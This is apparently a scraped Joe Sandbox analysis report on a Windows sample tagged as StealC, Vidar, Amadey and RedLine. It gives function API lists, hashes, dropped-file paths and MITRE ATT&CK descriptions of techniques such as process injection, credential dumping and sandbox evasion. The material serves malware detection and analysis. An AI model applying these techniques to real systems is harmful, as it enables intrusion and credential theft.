Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: 4d54e5c672f5b7fdccd202a244e9096ee452dd69a13c1d42272f60b665475efb
Instruction ID: 49f761be64241f55417ac9bf7973dedeefcd16c6e6cb555c730cf085416efb6b
Opcode Fuzzy Hash: 4d54e5c672f5b7fdccd202a244e9096ee452dd69a13c1d42272f60b665475efb
Instruction Fuzzy Hash: 3BD0223320810493C30023679C4EBAAB2ACC7C72B9F200836E00801E010B38C0DAD2A5

Function 6C850DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C850DF5
TlsGetValue.KERNEL32 ref: 6C850E2D
TlsGetValue.KERNEL32 ref: 6C850E58
TlsGetValue.KERNEL32 ref: 6C850E84

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: b5909edd7f10135cf4aef1496f7bdb2f337cf486062905e1cc4d675b2a2cfb05
Instruction ID: 4fc2c5e091b9257af5cc22e989d4ecf4c055cc74c07b34f3cb8ba5d63d650cfc
Opcode Fuzzy Hash: b5909edd7f10135cf4aef1496f7bdb2f337cf486062905e1cc4d675b2a2cfb05
Instruction Fuzzy Hash: 1131E671749784CFDBA06F78C64826977B4BF0A30DFB14E6DD88887A11DB7084A5CB81

Function 6C7AA4E0 Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,6C7AA468,00000000), ref: 6C7AA4F9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C7AA468,00000000), ref: 6C7AA51B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C7AA468,?,6C7AA468,00000000), ref: 6C7AA545
memcpy.VCRUNTIME140(00000001,6C7AA468,00000001,?,?,?,6C7AA468,00000000), ref: 6C7AA57D

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction ID: 2c49a9f49d12067ed703bb3c671710c308c36c4ffd8125784f4f28e74db78ac6
Opcode Fuzzy Hash: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction Fuzzy Hash: F51129B3E0131557DB0189F9DC81AAB77999FA5278F280338ED64877C0F635D90987E1

Function 6C850F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C7F2AF5,?,?,?,?,?,6C7F0A1B,00000000), ref: 6C850F1A
malloc.MOZGLUE(00000001), ref: 6C850F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C850F42
TlsGetValue.KERNEL32 ref: 6C850F5B

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: 3e66d8cd655f7c7494629a197a145d133b9cc851dc783f42d819346840378d94
Instruction ID: 41fd91ffa2be58753f287549429cfb0db50e6ddd8208ef1dfc88212c89756103
Opcode Fuzzy Hash: 3e66d8cd655f7c7494629a197a145d133b9cc851dc783f42d819346840378d94
Instruction Fuzzy Hash: 73014072F052405BE760273E8F0456676ACEF5225DF500935DC0CC6A51EB71C428C1D2

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Threatname: Amadey

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BAEBGCFIEHCFIDGCAAFBFCGCAA

C:\ProgramData\BGCAAFHIEBKJKEBFIEHD

C:\ProgramData\DBGHDGHCGHCAAKFIIECFHCFBFC

Windows Analysis Report
file.exe

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre